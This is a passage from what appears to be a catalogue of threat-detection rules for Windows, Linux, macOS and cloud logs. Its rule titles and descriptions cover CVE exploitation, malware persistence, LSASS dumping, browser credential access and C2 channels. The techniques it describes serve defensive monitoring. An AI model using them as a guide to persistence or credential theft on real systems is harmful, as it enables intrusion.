https://security.paloaltonetworks.com/CVE-2024-3400, https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis |
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group |
Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor.
VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
|
https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ |
Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity |
Detects any creation or modification to a windows domain group with the name "ESX Admins".
This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor.
VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
|
https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ |
CVE-2024-49113 Exploitation Attempt - LDAP Nightmare |
Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
|
https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7, https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/ |
CVE-2024-50623 Exploitation Attempt - Cleo |
Detects an exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Cleo software suite with a suspicious PowerShell command line.
|
https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild |
Potential CSharp Streamer RAT Loading .NET Executable Image |
Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
|
https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections, https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/ |
DarkGate - Drop DarkGate Loader In C:\Temp Directory |
Detects attackers attempting to save, decrypt and execute the DarkGate Loader in the C:\temp folder. |
https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/, https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html |
File Creation Related To RAT Clients |
Detects the creation of a ".conf" file related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
|
https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761, https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675 |
Potential KamiKakaBot Activity - Lure Document Execution |
Detects the execution of a Word document via the WinWord Start Menu shortcut.
This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/ |
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation |
Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command.
This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/, https://tria.ge/240123-rapteaahhr/behavioral1 |
Potential KamiKakaBot Activity - Winlogon Shell Persistence |
Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/ |
Potential Kapeka Decrypted Backdoor Indicator |
Detects the presence of a file that is a decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
The file name is typically 5-6 characters long, a random combination of consonants and vowels followed by a ".wll" extension, so that it poses as a legitimate file and evades detection.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Loaded Via Rundll32.EXE |
Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Persistence Activity |
Detects Kapeka backdoor persistence activity.
Depending on the process privileges, the Kapeka dropper sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or as an autorun registry entry (if not).
For the scheduled task, it creates a scheduled task called "Sens Api" via the schtasks command, which is set to run upon system startup as SYSTEM.
To establish persistence through the autorun registry key, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior |
Kapeka Backdoor Execution Via RunDLL32.EXE |
Detects the Kapeka backdoor process execution pattern, where the dropper launches the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Autorun Persistence |
Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. |
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Configuration Persistence |
Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Scheduled Task Creation |
Detects Kapeka backdoor scheduled task creation based on attributes such as paths, command line flags, etc. |
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698, https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior |
Lummac Stealer Activity - Execution Of More.com And Vbc.exe |
Detects the execution of more.com and vbc.exe in the process tree.
This behavior was observed by a set of samples related to Lummac Stealer.
The Lummac payload is injected into the vbc.exe process.
|
https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files, https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef, https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html, https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html |
Potential Raspberry Robin Aclui Dll SideLoading |
Detects potential sideloading of a malicious "aclui.dll" by OleView. This behavior was observed in Raspberry Robin variants reported by Check Point Research in February 2024.
|
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/, https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/, https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/, https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html |
Potential Raspberry Robin CPL Execution Activity |
Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
This behavior was observed in multiple Raspberry-Robin variants.
|
https://tria.ge/240226-fhbe7sdc39/behavioral1, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/ |
Potential Raspberry Robin Registry Set Internet Settings ZoneMap |
Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
Raspberry Robin may alter proxy settings to circumvent security measures that would otherwise block its connections, ensuring an unhindered connection to its command and control servers and thereby maintaining control over compromised systems.
|
https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt, https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/ |
DPRK Threat Actor - C2 Communication DNS Indicators |
Detects DNS queries for C2 domains used by DPRK Threat actors. |
https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2 |
Potential APT FIN7 Exploitation Activity |
Detects potential APT FIN7 exploitation activity as reported by Google.
In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to log in to a target server and initiate specific Windows process chains.
|
https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/ |
Forest Blizzard APT - File Creation Activity |
Detects the creation of specific files inside of ProgramData directory.
These files were seen being created by Forest Blizzard as described by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - JavaScript Constrained File Creation |
Detects the creation of JavaScript files inside of the DriverStore directory.
Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Process Creation Activity |
Detects the execution of specific process and command line combinations.
These were seen being created by Forest Blizzard as described by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Custom Protocol Handler Creation |
Detects the setting of a custom protocol handler with the name "rogue".
Seen being created by Forest Blizzard APT as reported by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Custom Protocol Handler DLL Registry Set |
Detects the setting of the DLL that handles the custom protocol handler.
Seen being created by Forest Blizzard APT as reported by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
ScreenConnect - SlashAndGrab Exploitation Indicators |
Detects indicators of post-exploitation activity by threat actors exploiting the "SlashAndGrab" vulnerability in ScreenConnect, as reported by Huntress.
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Account Created And Deleted By Non Approved Users |
Detects accounts that are created or deleted by non-approved users. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts |
Authentication Occurring Outside Normal Business Hours |
Detects user sign-ins outside of normal business hours. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins |
Privilege Role Elevation Not Occurring on SAW or PAW |
Detects failed sign-in from a PAW or SAW device |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
Privilege Role Sign-In Outside Expected Controls |
Detects failed sign-ins due to the user not meeting the expected controls for administrators |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
Privilege Role Sign-In Outside Of Normal Hours |
Detects account sign-ins outside of normal hours or from uncommon locations. Administrator accounts should be investigated. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
User with Privileges Logon |
Detects logons with "Special Groups" or "Special Privileges", which can be thought of as administrator groups or privileges. |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964 |
Potential Zerologon (CVE-2020-1472) Exploitation |
Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472) |
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472, https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/ |
Potential Pass the Hash Activity |
Detects the pass-the-hash attack technique, which is used to move laterally inside a network. |
https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events |
Remote Registry Management Using Reg Utility |
Detects remote registry management using the REG utility from a non-admin workstation. |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Interactive Logon to Server Systems |
Detects interactive console logons to Server Systems |
Internal Research |
DNS Request From Windows Script Host |
Detects unusual domain resolutions originating from CScript/WScript, which can identify malicious JavaScript files executing in an environment, often as a result of a phishing or watering hole attack.
|
Internal Research |
New RDP Connection Initiated From Domain Controller |
Detects an RDP connection originating from a domain controller. |
Internal Research |
Userdomain Variable Enumeration |
Detects suspicious enumeration of the domain the user is associated with. |
https://www.arxiv-vanity.com/papers/2008.04676/, https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/ |
Mail Forwarding/Redirecting Activity In O365 |
Detects email forwarding or redirecting activity in O365 Audit logs. |
https://redcanary.com/blog/email-forwarding-rules/, https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf |
Python Path Configuration File Creation - Linux |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Okta Password Health Report Query |
Detects all activities against the endpoint "/reports/password-health/*", which should only be accessed via the Okta Admin Console UI.
Use this rule to hunt for potentially suspicious requests. Correlate this event with an "admin console" login and alert on requests without any corresponding admin console login.
|
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach |
Terminate Linux Process Via Kill |
Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html, https://www.cyberciti.biz/faq/how-force-kill-process-linux/, https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/ |
Process Discovery |
Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
Information obtained could be used to gain an understanding of common software/applications running on systems within the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md, https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/ |
Python Path Configuration File Creation - MacOS |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Clipboard Data Collection Via Pbpaste |
Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
It can also be used in shell scripts that may require clipboard content as input.
Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
|
https://www.loobins.io/binaries/pbpaste/, https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b, https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF |
.Class Extension URI Ending Request |
Detects requests to URI ending with the ".class" extension in proxy logs.
This rule can be used to hunt for potential downloads of Java classes, as seen for example in Log4Shell exploitation attacks against Log4j.
|
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Firewall Rule Modified In The Windows Firewall Exception List |
Detects when a rule has been modified in the Windows firewall exception list |
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Access To Browser Credential Files By Uncommon Applications - Security |
Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential credential stealing attempt. This rule requires heavy baselining before usage.
|
https://ipurple.team/2024/09/10/browser-stored-credentials/ |
Scheduled Task Deletion |
Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious software often creates tasks directly under the root node, e.g. \TASKNAME |
https://twitter.com/matthewdunwoody/status/1352356685982146562, https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 |
Potential Remote WMI ActiveScriptEventConsumers Activity |
Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.
This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
|
https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html |
CreateRemoteThread API and LoadLibrary |
Detects potential use of the CreateRemoteThread API and the LoadLibrary function to inject a DLL into a process |
https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html |
Remote Thread Creation Via PowerShell |
Detects the creation of a remote thread from a PowerShell process into another process |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Access To Browser Credential Files By Uncommon Applications |
Detects file access requests to browser credential stores by uncommon processes.
Could indicate a potential credential stealing attempt.
Requires heavy baselining before usage.
|
https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users, https://github.com/lclevy/firepwd |
Access To Chromium Browsers Sensitive Files By Uncommon Applications |
Detects file access requests to Chromium-based browser sensitive files by uncommon processes.
Could indicate a potential attempt to steal sensitive information.
|
Internal Research |
Access To Windows Outlook Mail Files By Uncommon Applications |
Detects file access requests to Windows Outlook Mail by uncommon processes.
Could indicate a potential credential stealing attempt.
Requires heavy baselining before usage.
|
https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2, https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows |
Access To Sysvol Policies Share By Uncommon Process |
Detects file access requests to the Windows Sysvol Policies Share by uncommon processes |
https://github.com/vletoux/pingcastle |
Access To .Reg/.Hive Files By Uncommon Applications |
Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. |
https://github.com/tccontre/Reg-Restore-Persistence-Mole |
Unattend.XML File Access Attempt |
Detects attempts to access the "unattend.xml" file, where credentials might be stored.
This file is used during the unattended Windows install process.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
ADS Zone.Identifier Deleted |
Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. |
https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ |
DMP/HDMP File Creation |
Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. |
https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps |
Python Path Configuration File Creation - Windows |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Scheduled Task Created - FileCreation |
Detects the creation of a scheduled task via file creation. |
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5 |
Creation of an Executable by an Executable |
Detects the creation of an executable by another executable. |
Internal Research |
VsCode Code Tunnel Execution File Indicator |
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html |
WebDAV Temporary Local File Creation |
Detects the creation of WebDAV temporary files with potentially suspicious extensions |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4 |
Non-DLL Extension File Renamed With DLL Extension |
Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
|
https://twitter.com/ffforward/status/1481672378639912960, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location |
Amsi.DLL Load By Uncommon Process |
Detects loading of Amsi.dll by uncommon processes |
https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9, https://github.com/TheD1rkMtr/AMSI_patch, https://github.com/surya-dev-singh/AmsiBypass-OpenSession |
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process |
Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
|
https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 |
System Drawing DLL Load |
Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md |
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location |
Detects the loading of the "taskschd.dll" module by a process that is located in a potentially suspicious or uncommon directory.
The loading of this DLL might indicate that the application has the capability to create a scheduled task via the "Schedule.Service" COM object.
Investigation of the loading application and its behavior is required to determine if it is malicious.
|
https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/, https://x.com/Max_Mal_/status/1826179497084739829 |
Microsoft Excel Add-In Loaded |
Detects Microsoft Excel loading an Add-In (.xll) file |
https://www.mandiant.com/resources/blog/lnk-between-browsers |
Microsoft Word Add-In Loaded |
Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
|
https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file |
WMI Module Loaded By Uncommon Process |
Detects WMI modules being loaded by an uncommon process |
https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html |
Dfsvc.EXE Network Connection To Non-Local IPs |
Detects network connections to non-local IPs from "dfsvc.exe", a utility used to handle ClickOnce applications |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Dfsvc.EXE Initiated Network Connection Over Uncommon Port |
Detects an initiated network connection over uncommon ports from "dfsvc.exe", a utility used to handle ClickOnce applications. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Dllhost.EXE Initiated Network Connection To Non-Local IP Address |
Detects Dllhost.EXE initiating a network connection to a non-local IP address.
Aside from Microsoft's own IP range, which needs to be excluded, network communication from Dllhost will depend entirely on the hosted DLL.
An initial baseline is recommended before deployment.
|
https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 |
HH.EXE Initiated HTTP Network Connection |
Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
|
https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md |
Msiexec.EXE Initiated Network Connection Over HTTP |
Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
Use this rule to hunt for potentially anomalous or suspicious communications.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Network Connection Initiated By PowerShell Process |
Detects a network connection that was initiated from a PowerShell process.
Often, malicious PowerShell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
Use this rule as a basis for hunting for anomalies.
|
https://www.youtube.com/watch?v=DLtJTxMWZ2o |
Potentially Suspicious Azure Front Door Connection |
Detects connections with Azure Front Door (a known legitimate service that can be leveraged for C2)
that fall outside of the known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
|
https://lots-project.com/site/2a2e617a75726566642e6e6574, https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178, https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting |
Network Connection Initiated From Users\Public Folder |
Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone.
Use this rule to hunt for potentially suspicious or uncommon activity in your environment.
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
PsExec Default Named Pipe |
Detects PsExec service default pipe creation |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Uncommon PowerShell Hosts |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html |
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic |
Detects PowerShell execution that makes use of the bxor (bitwise XOR) operator.
Attackers might use it as an alternative obfuscation method to Base64 encoded commands.
Investigate the CommandLine and process tree to determine if the activity is malicious.
|
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1 |
Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet |
